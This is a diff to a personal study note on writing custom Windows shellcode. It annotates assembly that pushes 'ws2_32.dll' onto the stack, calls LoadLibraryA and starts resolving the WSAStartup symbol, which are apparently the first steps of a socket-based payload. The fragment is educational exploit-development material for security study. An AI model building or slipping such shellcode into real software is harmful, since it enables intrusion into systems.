BGuerrero825/Cyber-Notes/Offensive Security/Creating Custom Shellcode.md

 3. `push eax` : move `ll\0\0` to the stack
 4. `push 0x642e3233` : move the second byte "32.d" to the stack
 5. `push 0x5f327377` : move the first byte "ws2_" to the stack
-6. `push esp` : push the pointer to this string on the stack
+6. `push esp` : push the pointer to this string on the stack (this string pointer is actually the only argument required by LoadLibraryA, so we push the address of the string we just pushed)
 7. `call dword ptr[ebp+0x14]` : call LoadLibraryA

-Finding symbols in ws2_32.dll:
+Finding WSAStartup symbol in ws2_32.dll:
 ```
     " resolve_symbols_ws2_32:            "
     "   mov   ebx, eax                  ;"  #   Move the base address of ws2_32.dll to EBX